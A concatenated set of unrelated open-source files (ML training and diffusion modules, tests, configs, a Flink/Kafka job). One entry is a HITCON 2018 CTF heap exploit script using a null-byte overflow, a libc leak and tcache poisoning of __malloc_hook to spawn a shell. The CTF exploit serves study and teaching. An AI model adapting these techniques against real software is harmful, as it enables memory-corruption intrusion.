decay_steps=3000,
decay_rate=0.96,
staircase=True
)
optimizer = tf.keras.optimizers.Adam(learning_rate=lr_schedule)
return optimizer
def metric_generator(self):
metric = tf.keras.metrics.Mean()
return metric
def train(self):
        # GPU setup
tf.debugging.set_log_device_placement(True)
if use_gpu:
gpus = tf.config.experimental.list_physical_devices(device_type="GPU")
if gpus:
logging.info("use gpu device")
                # enable GPU memory growth
for gpu in gpus:
tf.config.experimental.set_memory_growth(device=gpu, enable=True)
tf.print(gpu)
else:
os.environ["CUDA_VISIBLE_DEVICE"] = "-1"
logging.info("not found gpu device,convert to use cpu")
else:
logging.info("use cpu device")
            # disable the GPU
os.environ["CUDA_VISIBLE_DEVICE"] = "-1"
        # training data
train_dataset, train_count = self.data_generator()
        # network structure
net = self.net_generator()
net.summary()
global fine_tune_epoch
        # whether to fine-tune from saved weights
if fine_tune:
net.load_weights(filepath=weights_path + "epoch-{}".format(fine_tune_epoch))
print("load {} epoch weigth".format(fine_tune))
else:
fine_tune_epoch = -1
print("train model from init")
        # set up the loss function
loss = self.loss_generator()
        # set up the optimizer
optimizer = self.optimizer_generator()
        # set up the evaluation metric
metric = self.metric_generator()
        # model training and weight updates
for epoch in range(fine_tune_epoch + 1, train_epochs):
step = 0
for train_dataset_batch in train_dataset:
# print(train_dataset_batch)
step += 1
images, boxes = parse_dataset_batch(dataset=train_dataset_batch)
image_batch = process_image_batch(images)
label_batch = generate_label_batch(boxes)
with tf.GradientTape() as tape:
out = net(image_batch)
total_loss = loss(y_true=label_batch, y_pred=out)
gradients = tape.gradient(total_loss, net.trainable_variables)
optimizer.apply_gradients(grads_and_vars=zip(gradients, net.trainable_variables))
                metric.update_state(values=total_loss)
print("Epoch: {}/{}, step: {}/{} ,loss: {:.5f}".format(
epoch, train_epochs, step, tf.math.ceil(train_count / batch_size), metric.result()
))
metric.reset_states()
if epoch % save_frequency == 0:
net.save_weights(filepath=weights_path + "epoch-{}".format(epoch), save_format='tf')
net.save_weights(filepath=weights_path + "epoch-{}".format(train_epochs), save_format='tf')
if __name__ == '__main__':
yolo = BaseModel()
yolo.train()
|
packages/core/minos-microservice-networks/minos/networks/brokers/handlers/__init__.py | bhardwajRahul/minos-python | 247 | 12796186 | from .impl import (
BrokerHandler,
)
from .ports import (
BrokerHandlerService,
BrokerPort,
)
|
HITCON/2018/children_tcache/exploit.py | Per5ianCat/ctf-writeups | 476 | 12796193 | #!/usr/bin/env python
from pwn import *
def new_heap(size, data, attack=False):
p.sendlineafter('Your choice: ', '1')
p.sendlineafter('Size:', str(size))
if attack:
return
p.sendafter('Data:', data)
if len(data) < size:
p.sendline()
def show_heap(index):
p.sendlineafter('Your choice: ', '2')
p.sendlineafter('Index:', str(index))
def delete_heap(index):
p.sendlineafter('Your choice: ', '3')
p.sendlineafter('Index:', str(index))
with context.quiet:
# hitcon{l4st_rem41nd3r_1s_v3ry_us3ful}
# p = remote('192.168.127.12', 8763)
p = process('./program', env = {'LD_PRELOAD': './libc-2.27.so'})
# table[0] => chunk_0 (0x511)
new_heap(0x500, 'a' * 0x4ff)
# table[1] => chunk_1 (0x71)
new_heap(0x68, 'b' * 0x67)
# table[2] => chunk_2 (0x601)
new_heap(0x5f0, 'c' * 0x5ef)
# table[3] => chunk_3 (0x31)
# this chunk is for preventing consolidation of previous
# chunks with the top chunk
new_heap(0x20, 'd' * 0x20)
# we need to delete chunk_1, so we can re-allocate it again
# in order to launch off-by-one (poison-null-byte) attack
delete_heap(1)
# chunk_0 should we freed so it can be consolidated with chunk_2 later
delete_heap(0)
# when we free a chunk, the program writes 0xDA over the whole chunk
# so, we need to zero out some parts of chunk_1. Therefore,
# we allocate/free chunk_1 multiple times with different sizes
# interestingly, it always has a chunk size of 0x71, but the program only cares
# about the input size
for i in range(9):
# table[0] => chunk_1 (0x71)
# this causes strcpy writes null byte at the end of buffer.
# when i == 0, off-by-one happens and turn size of chunk_2 from
# 0x601 t0 0x600. Therefore, we clear PREV_IN_USE bit.
new_heap(0x68 - i, 'b' * (0x68 - i))
# we need to free the chunk, so malloc returns it on the next new_heap call
delete_heap(0)
# table[0] => chunk_1 (0x71)
# this set the prev_size field of chunk_2
new_heap(0x68, 'b' * 0x60 + p64(0x580))
# when we free chunk_2, it consolidates with chunk_0
# therefore, we have a overlapping free chunk with chunk_1
# the resulting big chunk will be put in the unsorted bin
delete_heap(2)
# table[1] => chunk_4 (0x511)
# this will use the unsorted bin for allocation, and writes
# a libc address into chunk_1 fd/bk fields
new_heap(0x508, 'e' * 0x507)
# viewing chunk_1 will leak a libc address
show_heap(0)
libc_addr = p.recvuntil('\n$$')[:-3]
libc_base = u64(libc_addr + '\x00' * (8 - len(libc_addr))) - 0x3ebca0
print 'libc base: {}'.format(hex(libc_base))
# table[2] => chunk_5 (0x71)
# this will allocate chunk_5 exactly in the same place as chunk_1
new_heap(0x68, 'f' * 0x67)
# we used tcache_dup attack here which is due to double free
# freeing chunk_1 and chunk_5 put them in the same bin in tcache
# even though they are pointing to the same address
delete_heap(0)
delete_heap(2)
# we can create a fake chunk before __malloc_hook with size of 0x7f
malloc_hook = libc_base + 0x3ebc30
fake_chunk = malloc_hook - 0x13
print 'fake chunk: {}'.format(hex(fake_chunk))
# table[4] => chunk_5 (0x71)
# we used tcache_poisoning here
# chunk_5 will be served from tcache and we will put the address of
# our fake chunk in the chunk_1's fd.
new_heap(0x68, p64(fake_chunk))
# table[5] => chunk_1 (0x71)
# this allocation serves chunk_1 and put fake chunk address in the tcache
new_heap(0x68, 'h' * 0x67)
'''
0x4f322 execve("/bin/sh", rsp+0x40, environ)
constraints:
[rsp+0x40] == NULL
'''
# table[6] => fake_chunk (0x7f)
# since fake_chunk is at the head of the list, this allocation returns it
# then, we overwrite __malloc_hook with one gadget
new_heap(0x68, 'i' * 0x13 + p64(libc_base + 0x4f322))
# this allocation triggers __malloc_hook and we have shell
new_heap(1, '', True)
p.interactive()
|
codeforces/acmsguru/112.py | Ashindustry007/competitive-programming | 506 | 12796206 | #!/usr/bin/env python3
# https://codeforces.com/problemsets/acmsguru/problem/99999/112
a,b=map(int,input().split())
print(pow(a,b)-pow(b,a))
|
mmgen/models/architectures/ddpm/modules.py | plutoyuxie/mmgeneration | 718 | 12796227 | <reponame>plutoyuxie/mmgeneration<gh_stars>100-1000
# Copyright (c) OpenMMLab. All rights reserved.
from copy import deepcopy
from functools import partial
import mmcv
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import ACTIVATION_LAYERS
from mmcv.cnn.bricks import build_activation_layer, build_norm_layer
from mmcv.cnn.utils import constant_init
from mmgen.models.builder import MODULES, build_module
class EmbedSequential(nn.Sequential):
"""A sequential module that passes timestep embeddings to the children that
support it as an extra input.
Modified from
https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35
"""
def forward(self, x, y):
for layer in self:
if isinstance(layer, DenoisingResBlock):
x = layer(x, y)
else:
x = layer(x)
return x
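# Usage sketch (illustrative, kept as comments; DenoisingResBlock and
# MultiHeadAttention are defined further down in this file):
#
#   block = EmbedSequential(
#       DenoisingResBlock(in_channels=64, embedding_channels=256,
#                         use_scale_shift_norm=True, dropout=0.1),
#       MultiHeadAttention(in_channels=64))
#   out = block(x, t_emb)   # t_emb is only forwarded to the DenoisingResBlock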
@ACTIVATION_LAYERS.register_module()
class SiLU(nn.Module):
r"""Applies the Sigmoid Linear Unit (SiLU) function, element-wise.
The SiLU function is also known as the swish function.
Args:
input (bool, optional): Use inplace operation or not.
Defaults to `False`.
"""
def __init__(self, inplace=False):
super().__init__()
if torch.__version__ < '1.6.0' and inplace:
mmcv.print_log('Inplace version of \'SiLU\' is not supported for '
                           f'torch < 1.6.0, found \'{torch.__version__}\'.')
self.inplace = inplace
def forward(self, x):
"""Forward function for SiLU.
Args:
x (torch.Tensor): Input tensor.
Returns:
torch.Tensor: Tensor after activation.
"""
if torch.__version__ < '1.6.0':
return x * torch.sigmoid(x)
return F.silu(x, inplace=self.inplace)
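# Quick sanity sketch (illustrative, kept as comments): SiLU(x) == x * sigmoid(x).
#
#   x = torch.linspace(-3, 3, 7)
#   assert torch.allclose(SiLU()(x), x * torch.sigmoid(x))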
@MODULES.register_module()
class MultiHeadAttention(nn.Module):
"""An attention block allows spatial position to attend to each other.
Originally ported from here, but adapted to the N-d case.
https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa
Args:
in_channels (int): Channels of the input feature map.
num_heads (int, optional): Number of heads in the attention.
norm_cfg (dict, optional): Config for normalization layer. Default
to ``dict(type='GN', num_groups=32)``
"""
def __init__(self,
in_channels,
num_heads=1,
norm_cfg=dict(type='GN', num_groups=32)):
super().__init__()
self.num_heads = num_heads
_, self.norm = build_norm_layer(norm_cfg, in_channels)
self.qkv = nn.Conv1d(in_channels, in_channels * 3, 1)
self.proj = nn.Conv1d(in_channels, in_channels, 1)
self.init_weights()
@staticmethod
def QKVAttention(qkv):
channel = qkv.shape[1] // 3
q, k, v = torch.chunk(qkv, 3, dim=1)
scale = 1 / np.sqrt(np.sqrt(channel))
weight = torch.einsum('bct,bcs->bts', q * scale, k * scale)
weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype)
weight = torch.einsum('bts,bcs->bct', weight, v)
return weight
def forward(self, x):
"""Forward function for multi head attention.
Args:
x (torch.Tensor): Input feature map.
Returns:
torch.Tensor: Feature map after attention.
"""
b, c, *spatial = x.shape
x = x.reshape(b, c, -1)
qkv = self.qkv(self.norm(x))
qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2])
h = self.QKVAttention(qkv)
h = h.reshape(b, -1, h.shape[-1])
h = self.proj(h)
return (h + x).reshape(b, c, *spatial)
def init_weights(self):
constant_init(self.proj, 0)
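# Shape sketch (illustrative, kept as comments): the attention block preserves the
# input shape; in_channels should be divisible by num_heads and by the GN group
# count (32 by default).
#
#   attn = MultiHeadAttention(in_channels=64, num_heads=4)
#   x = torch.randn(2, 64, 16, 16)
#   assert attn(x).shape == x.shape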
@MODULES.register_module()
class TimeEmbedding(nn.Module):
"""Time embedding layer, reference to Two level embedding. First embedding
time by an embedding function, then feed to neural networks.
Args:
in_channels (int): The channel number of the input feature map.
embedding_channels (int): The channel number of the output embedding.
embedding_mode (str, optional): Embedding mode for the time embedding.
Defaults to 'sin'.
embedding_cfg (dict, optional): Config for time embedding.
Defaults to None.
act_cfg (dict, optional): Config for activation layer. Defaults to
``dict(type='SiLU', inplace=False)``.
"""
def __init__(self,
in_channels,
embedding_channels,
embedding_mode='sin',
embedding_cfg=None,
act_cfg=dict(type='SiLU', inplace=False)):
super().__init__()
self.blocks = nn.Sequential(
nn.Linear(in_channels, embedding_channels),
build_activation_layer(act_cfg),
nn.Linear(embedding_channels, embedding_channels))
# add `dim` to embedding config
embedding_cfg_ = dict(dim=in_channels)
if embedding_cfg is not None:
embedding_cfg_.update(embedding_cfg)
if embedding_mode.upper() == 'SIN':
self.embedding_fn = partial(self.sinusodial_embedding,
**embedding_cfg_)
else:
raise ValueError('Only support `SIN` for time embedding, '
f'but receive {embedding_mode}.')
@staticmethod
def sinusodial_embedding(timesteps, dim, max_period=10000):
"""Create sinusoidal timestep embeddings.
Args:
timesteps (torch.Tensor): Timestep to embedding. 1-D tensor shape
as ``[bz, ]``, one per batch element.
dim (int): The dimension of the embedding.
max_period (int, optional): Controls the minimum frequency of the
embeddings. Defaults to ``10000``.
Returns:
torch.Tensor: Embedding results shape as `[bz, dim]`.
"""
half = dim // 2
freqs = torch.exp(
-np.log(max_period) *
torch.arange(start=0, end=half, dtype=torch.float32) /
half).to(device=timesteps.device)
args = timesteps[:, None].float() * freqs[None]
embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1)
if dim % 2:
embedding = torch.cat(
[embedding, torch.zeros_like(embedding[:, :1])], dim=-1)
return embedding
def forward(self, t):
"""Forward function for time embedding layer.
Args:
t (torch.Tensor): Input timesteps.
Returns:
torch.Tensor: Timesteps embedding.
"""
return self.blocks(self.embedding_fn(t))
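# Shape sketch (illustrative, kept as comments): embedding a batch of 8 integer
# timesteps with in_channels=128 and embedding_channels=512 gives a [8, 512] tensor.
#
#   emb = TimeEmbedding(in_channels=128, embedding_channels=512)
#   t = torch.randint(0, 1000, (8,))
#   assert emb(t).shape == (8, 512)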
@MODULES.register_module()
class DenoisingResBlock(nn.Module):
"""Resblock for the denoising network. If `in_channels` not equals to
`out_channels`, a learnable shortcut with conv layers will be added.
Args:
in_channels (int): Number of channels of the input feature map.
embedding_channels (int): Number of channels of the input embedding.
use_scale_shift_norm (bool): Whether use scale-shift-norm in
`NormWithEmbedding` layer.
dropout (float): Probability of the dropout layers.
out_channels (int, optional): Number of output channels of the
ResBlock. If not defined, the output channels will equal to the
`in_channels`. Defaults to `None`.
norm_cfg (dict, optional): The config for the normalization layers.
            Defaults to ``dict(type='GN', num_groups=32)``.
act_cfg (dict, optional): The config for the activation layers.
Defaults to ``dict(type='SiLU', inplace=False)``.
shortcut_kernel_size (int, optional): The kernel size for the shortcut
conv. Defaults to ``1``.
"""
def __init__(self,
in_channels,
embedding_channels,
use_scale_shift_norm,
dropout,
out_channels=None,
norm_cfg=dict(type='GN', num_groups=32),
act_cfg=dict(type='SiLU', inplace=False),
shortcut_kernel_size=1):
super().__init__()
out_channels = in_channels if out_channels is None else out_channels
_norm_cfg = deepcopy(norm_cfg)
_, norm_1 = build_norm_layer(_norm_cfg, in_channels)
conv_1 = [
norm_1,
build_activation_layer(act_cfg),
nn.Conv2d(in_channels, out_channels, 3, padding=1)
]
self.conv_1 = nn.Sequential(*conv_1)
norm_with_embedding_cfg = dict(
in_channels=out_channels,
embedding_channels=embedding_channels,
use_scale_shift=use_scale_shift_norm,
norm_cfg=_norm_cfg)
self.norm_with_embedding = build_module(
dict(type='NormWithEmbedding'),
default_args=norm_with_embedding_cfg)
conv_2 = [
build_activation_layer(act_cfg),
nn.Dropout(dropout),
nn.Conv2d(out_channels, out_channels, 3, padding=1)
]
self.conv_2 = nn.Sequential(*conv_2)
assert shortcut_kernel_size in [
1, 3
], ('Only support `1` and `3` for `shortcut_kernel_size`, but '
f'receive {shortcut_kernel_size}.')
self.learnable_shortcut = out_channels != in_channels
if self.learnable_shortcut:
shortcut_padding = 1 if shortcut_kernel_size == 3 else 0
self.shortcut = nn.Conv2d(
in_channels,
out_channels,
shortcut_kernel_size,
padding=shortcut_padding)
self.init_weights()
def forward_shortcut(self, x):
if self.learnable_shortcut:
return self.shortcut(x)
return x
def forward(self, x, y):
"""Forward function.
Args:
x (torch.Tensor): Input feature map tensor.
y (torch.Tensor): Shared time embedding or shared label embedding.
Returns:
torch.Tensor : Output feature map tensor.
"""
shortcut = self.forward_shortcut(x)
x = self.conv_1(x)
x = self.norm_with_embedding(x, y)
x = self.conv_2(x)
return x + shortcut
def init_weights(self):
# apply zero init to last conv layer
constant_init(self.conv_2[-1], 0)
@MODULES.register_module()
class NormWithEmbedding(nn.Module):
"""Nornalization with embedding layer. If `use_scale_shift == True`,
embedding results will be chunked and used to re-shift and re-scale
normalization results. Otherwise, embedding results will directly add to
input of normalization layer.
Args:
in_channels (int): Number of channels of the input feature map.
        embedding_channels (int): Number of channels of the input embedding.
norm_cfg (dict, optional): Config for the normalization operation.
Defaults to `dict(type='GN', num_groups=32)`.
act_cfg (dict, optional): Config for the activation layer. Defaults
to `dict(type='SiLU', inplace=False)`.
use_scale_shift (bool): If True, the output of Embedding layer will be
split to 'scale' and 'shift' and map the output of normalization
layer to ``out * (1 + scale) + shift``. Otherwise, the output of
Embedding layer will be added with the input before normalization
operation. Defaults to True.
"""
def __init__(self,
in_channels,
embedding_channels,
norm_cfg=dict(type='GN', num_groups=32),
act_cfg=dict(type='SiLU', inplace=False),
use_scale_shift=True):
super().__init__()
self.use_scale_shift = use_scale_shift
_, self.norm = build_norm_layer(norm_cfg, in_channels)
embedding_output = in_channels * 2 if use_scale_shift else in_channels
self.embedding_layer = nn.Sequential(
build_activation_layer(act_cfg),
nn.Linear(embedding_channels, embedding_output))
def forward(self, x, y):
"""Forward function.
Args:
x (torch.Tensor): Input feature map tensor.
y (torch.Tensor): Shared time embedding or shared label embedding.
Returns:
torch.Tensor : Output feature map tensor.
"""
embedding = self.embedding_layer(y)[:, :, None, None]
if self.use_scale_shift:
scale, shift = torch.chunk(embedding, 2, dim=1)
x = self.norm(x)
x = x * (1 + scale) + shift
else:
x = self.norm(x + embedding)
return x
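# Shape sketch (illustrative, kept as comments): with use_scale_shift=True the
# [N, 2*C] embedding is split into per-channel scale and shift, so the output is
# norm(x) * (1 + scale) + shift and keeps the input shape.
#
#   nwe = NormWithEmbedding(in_channels=64, embedding_channels=256)
#   x = torch.randn(2, 64, 32, 32)
#   y = torch.randn(2, 256)
#   assert nwe(x, y).shape == x.shape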
@MODULES.register_module()
class DenoisingDownsample(nn.Module):
"""Downsampling operation used in the denoising network. Support average
pooling and convolution for downsample operation.
Args:
in_channels (int): Number of channels of the input feature map to be
downsampled.
with_conv (bool, optional): Whether use convolution operation for
downsampling. Defaults to `True`.
"""
def __init__(self, in_channels, with_conv=True):
super().__init__()
if with_conv:
self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1)
else:
self.downsample = nn.AvgPool2d(stride=2)
def forward(self, x):
"""Forward function for downsampling operation.
Args:
x (torch.Tensor): Feature map to downsample.
Returns:
torch.Tensor: Feature map after downsampling.
"""
return self.downsample(x)
@MODULES.register_module()
class DenoisingUpsample(nn.Module):
"""Upsampling operation used in the denoising network. Allows users to
apply an additional convolution layer after the nearest interpolation
operation.
Args:
in_channels (int): Number of channels of the input feature map to be
downsampled.
with_conv (bool, optional): Whether apply an additional convolution
layer after upsampling. Defaults to `True`.
"""
def __init__(self, in_channels, with_conv=True):
super().__init__()
if with_conv:
self.with_conv = True
self.conv = nn.Conv2d(in_channels, in_channels, 3, 1, 1)
def forward(self, x):
"""Forward function for upsampling operation.
Args:
x (torch.Tensor): Feature map to upsample.
Returns:
torch.Tensor: Feature map after upsampling.
"""
x = F.interpolate(x, scale_factor=2, mode='nearest')
if self.with_conv:
x = self.conv(x)
return x
|
kaldi/lm/__init__.py | mxmpl/pykaldi | 916 | 12796238 | from ._arpa_file_parser import ArpaParseOptions
from ._arpa_lm_compiler import *
from ._const_arpa_lm import *
from ._kaldi_rnnlm import *
__all__ = [name for name in dir()
if name[0] != '_'
and not name.endswith('Base')]
|
vdpwi/utils/preprocess.py | achyudh/castor | 132 | 12796244 | import argparse
import os
from scipy.special import erf
from scipy.stats import truncnorm
import numpy as np
import data
def build_vector_cache(glove_filename, vec_cache_filename, vocab):
print("Building vector cache...")
with open(glove_filename) as f, open(vec_cache_filename, "w") as f2:
for line in f:
tok, vec = line.split(" ", 1)
if tok in vocab:
vocab.remove(tok)
f2.write("{} {}".format(tok, vec))
def discrete_tnorm(a, b, tgt_loc, sigma=1, n_steps=100):
def phi(zeta):
return 1 / (np.sqrt(2 * np.pi)) * np.exp(-0.5 * zeta**2)
def Phi(x):
return 0.5 * (1 + erf(x / np.sqrt(2)))
def tgt_loc_update(x):
y1 = phi((a - x) / sigma)
y2 = phi((b - x) / sigma)
x1 = Phi((b - x) / sigma)
x2 = Phi((a - x) / sigma)
denom = x1 - x2 + 1E-4
return y1 / denom - y2 / denom
x = tgt_loc
direction = np.sign(tgt_loc - (b - a))
for _ in range(n_steps):
x = tgt_loc - sigma * tgt_loc_update(x)
tn = truncnorm((a - x) / sigma, (b - x) / sigma, loc=x, scale=sigma)
rrange = np.arange(a, b + 1)
pmf = tn.pdf(rrange)
pmf /= np.sum(pmf)
return pmf
def discrete_lerp(a, b, ground_truth):
pmf = np.zeros(b - a + 1)
c = int(np.ceil(ground_truth + 1E-8))
f = int(np.floor(ground_truth))
pmf[min(c - a, b - a)] = ground_truth - f
pmf[f - a] = c - ground_truth
return pmf
def smoothed_labels(truth, n_labels):
return discrete_lerp(1, n_labels, truth)
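# Worked example (illustrative): smoothed_labels(3.4, 5) splits the probability mass
# between the two nearest labels on the 1..5 scale, giving approximately
# [0.0, 0.0, 0.6, 0.4, 0.0] (0.6 on label 3 and 0.4 on label 4, up to float rounding).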
def preprocess(filename, output_name="sim_sparse.txt"):
print("Preprocessing {}...".format(filename))
with open(filename) as f:
values = [float(l.strip()) for l in f.readlines()]
values = [" ".join([str(l) for l in smoothed_labels(v, 5)]) for v in values]
with open(os.path.join(os.path.dirname(filename), output_name), "w") as f:
f.write("\n".join(values))
def add_vocab(tok_filename, vocab):
with open(tok_filename) as f:
for line in f:
vocab.update(line.strip().split())
def main():
base_conf = data.Configs.base_config()
sick_conf = data.Configs.sick_config()
sick_folder = sick_conf.sick_data
vocab = set()
for name in ("train", "dev", "test"):
preprocess(os.path.join(sick_folder, name, "sim.txt"))
add_vocab(os.path.join(sick_folder, name, "a.toks"), vocab)
add_vocab(os.path.join(sick_folder, name, "b.toks"), vocab)
build_vector_cache(base_conf.wordvecs_file, sick_conf.sick_cache, vocab)
if __name__ == "__main__":
main()
|
RecoLocalTracker/SubCollectionProducers/python/ClusterMultiplicityFilter_cfi.py | ckamtsikis/cmssw | 852 | 12796248 | <gh_stars>100-1000
import FWCore.ParameterSet.Config as cms
tifClusterFilter = cms.EDFilter("ClusterMultiplicityFilter",
MaxNumberOfClusters = cms.uint32(300),
ClusterCollection = cms.InputTag('siStripClusters')
)
|
networkit/test/test_matching_algorithms.py | angriman/network | 366 | 12796257 | #!/usr/bin/env python3
import random
import unittest
import networkit as nk
class TestMatchingAlgorithms(unittest.TestCase):
def generateRandomWeights(self, g):
if not g.isWeighted():
g = nk.graphtools.toWeighted(g)
for e in g.iterEdges():
g.setWeight(e[0], e[1], random.random())
return g
def setUp(self):
self.g = nk.readGraph("input/PGPgiantcompo.graph", nk.Format.METIS)
self.gw = self.generateRandomWeights(self.g)
def hasUnmatchedNeighbors(self, g, m):
for e in g.iterEdges():
if not m.isMatched(e[0]) and not m.isMatched(e[1]):
return True
return False
def testPathGrowingMatcher(self):
def runAlgo(g):
pgm = nk.matching.PathGrowingMatcher(self.g)
pgm.run()
m = pgm.getMatching()
runAlgo(self.g)
runAlgo(self.gw)
def testSuitorMatcher(self):
def doTest(g):
m1 = nk.matching.SuitorMatcher(g, False).run().getMatching()
nk.graphtools.sortEdgesByWeight(g, True)
self.assertTrue(m1.isProper(g))
self.assertFalse(self.hasUnmatchedNeighbors(g, m1))
m2 = nk.matching.SuitorMatcher(g, True).run().getMatching()
self.assertTrue(m2.isProper(g))
self.assertFalse(self.hasUnmatchedNeighbors(g, m2))
for u in g.iterNodes():
self.assertEqual(m1.mate(u), m2.mate(u))
doTest(self.g)
doTest(self.gw)
if __name__ == "__main__":
unittest.main()
|
scripts/examples/OpenMV/32-modbus/modbus_apriltag.py | jiskra/openmv | 1,761 | 12796287 | <gh_stars>1000+
import sensor, image
import time
from pyb import UART
from modbus import ModbusRTU
sensor.reset()
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.set_framesize(sensor.QQVGA) # we run out of memory if the resolution is much bigger...
uart = UART(3,115200, parity=None, stop=2, timeout=1, timeout_char=4)
modbus = ModbusRTU(uart, register_num=9999)
sensor.skip_frames(time = 2000)
clock = time.clock()
while(True):
if modbus.any():
modbus.handle(debug=True)
else:
clock.tick()
img = sensor.snapshot()
tags = img.find_apriltags() # defaults to TAG36H11 without "families".
modbus.clear()
modbus.REGISTER[0] = len(tags)
if tags:
print(tags)
i = 1
for tag in tags:
img.draw_rectangle(tag.rect(), color = 127)
modbus.REGISTER[i] = tag.family()
i += 1
modbus.REGISTER[i] = tag.id()
i += 1
modbus.REGISTER[i] = tag.cx()
i += 1
modbus.REGISTER[i] = tag.cy()
i += 1
#print(modbus.REGISTER[0:15])
#print(clock.fps())
|
formats/ycd/__init__.py | Adobe12327/Sollumz | 131 | 12796316 | <filename>formats/ycd/__init__.py
if "bpy" in locals():
import importlib
importlib.reload(Animation)
importlib.reload(AnimSequence)
importlib.reload(Channel)
importlib.reload(Clip)
importlib.reload(ClipDictionary)
importlib.reload(utils)
else:
from . import Animation
from . import AnimSequence
from . import Channel
from . import Clip
from . import ClipDictionary
from . import utils
import bpy |
iepy/webui/corpus/migrations/0003_remove_dont_know_option.py | francolq/iepy | 813 | 12796326 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('corpus', '0002_data_migration_dont_know_skip_merge'),
]
operations = [
migrations.AlterField(
model_name='evidencelabel',
name='label',
preserve_default=True,
field=models.CharField(
default='SK',
null=True,
max_length=2,
choices=[
('YE', 'Yes, relation is present'),
('NO', 'No relation present'),
('NS', 'Evidence is nonsense'),
('SK', 'Skipped labeling of this evidence')
]
),
),
]
|
examples/image/plot_dataset_mtf.py | Pandinosaurus/pyts | 1,217 | 12796363 | """
====================================
Data set of Markov transition fields
====================================
A Markov transition field is an image obtained from a time series, representing
a field of transition probabilities for a discretized time series.
Different strategies can be used to bin time series.
It is implemented as :class:`pyts.image.MarkovTransitionField`.
In this example, we consider the training samples of the
`GunPoint dataset <http://timeseriesclassification.com/description.php?Dataset=GunPoint>`_,
consisting of 50 univariate time series of length 150.
The Markov transition field of each time series is independently computed and
the 50 Markov transition fields are plotted.
""" # noqa:E501
# Author: <NAME> <<EMAIL>>
# License: BSD-3-Clause
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import ImageGrid
from pyts.image import MarkovTransitionField
from pyts.datasets import load_gunpoint
# Load the GunPoint dataset
X, _, _, _ = load_gunpoint(return_X_y=True)
# Compute the Markov transition fields for all the time series
mtf = MarkovTransitionField(n_bins=8)
X_mtf = mtf.fit_transform(X)
# Plot the 50 Markov transition fields
fig = plt.figure(figsize=(10, 5))
grid = ImageGrid(fig, 111, nrows_ncols=(5, 10), axes_pad=0.1, share_all=True,
cbar_mode='single')
for i, ax in enumerate(grid):
im = ax.imshow(X_mtf[i], cmap='rainbow', origin='lower', vmin=0., vmax=1.)
grid[0].get_yaxis().set_ticks([])
grid[0].get_xaxis().set_ticks([])
plt.colorbar(im, cax=grid.cbar_axes[0])
ax.cax.toggle_label(True)
fig.suptitle("Markov transition fields for the 50 time series in the "
"'GunPoint' dataset", y=0.92)
plt.show()
|
core/src/autogluon/core/searcher/bayesopt/tuning_algorithms/defaults.py | zhiqiangdon/autogluon | 4,462 | 12796388 | <gh_stars>1000+
from .bo_algorithm_components import LBFGSOptimizeAcquisition
from ..models.meanstd_acqfunc_impl import EIAcquisitionFunction
DEFAULT_ACQUISITION_FUNCTION = EIAcquisitionFunction
DEFAULT_LOCAL_OPTIMIZER_CLASS = LBFGSOptimizeAcquisition
DEFAULT_NUM_INITIAL_CANDIDATES = 250
DEFAULT_NUM_INITIAL_RANDOM_EVALUATIONS = 3
|
tensorflow/27.pyflink-kafka/notebooks/tensorflow_predict.py | huseinzol05/Gather-Tensorflow-Serving | 267 | 12796392 | from pyflink.datastream import StreamExecutionEnvironment, TimeCharacteristic
from pyflink.table import StreamTableEnvironment, DataTypes, EnvironmentSettings
from pyflink.table.descriptors import (
Schema,
Kafka,
Json,
Rowtime,
OldCsv,
FileSystem,
)
from pyflink.table.udf import udf
s_env = StreamExecutionEnvironment.get_execution_environment()
s_env.set_stream_time_characteristic(TimeCharacteristic.EventTime)
s_env.set_parallelism(1)
st_env = StreamTableEnvironment.create(
s_env,
environment_settings = EnvironmentSettings.new_instance()
.in_streaming_mode()
.use_blink_planner()
.build(),
)
X, Y, sess = None, None, None
@udf(result_type = DataTypes.STRING())
def predict(string):
global X, Y, sess
import tensorflow as tf
import json
import numpy as np
def load_graph(frozen_graph_filename):
with tf.gfile.GFile(frozen_graph_filename, 'rb') as f:
graph_def = tf.GraphDef()
graph_def.ParseFromString(f.read())
with tf.Graph().as_default() as graph:
tf.import_graph_def(graph_def)
return graph
if X is None or Y is None or sess is None:
g = load_graph('/notebooks/frozen_model.pb')
X = g.get_tensor_by_name('import/Placeholder:0')
Y = g.get_tensor_by_name('import/logits:0')
sess = tf.Session(graph = g)
label = ['negative', 'positive']
maxlen = 50
UNK = 3
with open('/notebooks/dictionary-test.json', 'r') as fopen:
dic = json.load(fopen)
sentences = [string]
x = np.zeros((len(sentences), maxlen))
for i, sentence in enumerate(sentences):
for no, k in enumerate(sentence.split()[:maxlen][::-1]):
x[i, -1 - no] = dic.get(k, UNK)
indices = np.argmax(sess.run(Y, feed_dict = {X: x}), axis = 1)
return label[indices[0]]
st_env.set_python_requirements('/notebooks/requirements.txt')
st_env.register_function('predict', predict)
st_env.connect(
Kafka()
.version('universal')
.topic('test')
.start_from_earliest()
.property('zookeeper.connect', 'zookeeper:2181')
.property('bootstrap.servers', 'kafka:9092')
).with_format(
Json()
.fail_on_missing_field(True)
.schema(
DataTypes.ROW(
[
DataTypes.FIELD('datetime', DataTypes.STRING()),
DataTypes.FIELD('text', DataTypes.STRING()),
]
)
)
).with_schema(
Schema()
.field('datetime', DataTypes.STRING())
.field('text', DataTypes.STRING())
).in_append_mode().register_table_source(
'source'
)
result_path = '/notebooks/output-tensorflow.csv'
st_env.connect(FileSystem().path(result_path)).with_format(
OldCsv()
.field_delimiter(',')
.field('datetime', DataTypes.STRING())
.field('sentence', DataTypes.STRING())
.field('label', DataTypes.STRING())
).with_schema(
Schema()
.field('datetime', DataTypes.STRING())
.field('sentence', DataTypes.STRING())
.field('label', DataTypes.STRING())
).in_append_mode().register_table_sink(
'sink'
)
st_env.from_path('source').select(
'datetime, sentence, predict(sentence)'
).insert_into('sink')
st_env.execute('predict')
|
docs/code/snippet_nmf_fro.py | askerdb/nimfa | 325 | 12796445 | import numpy as np
import nimfa
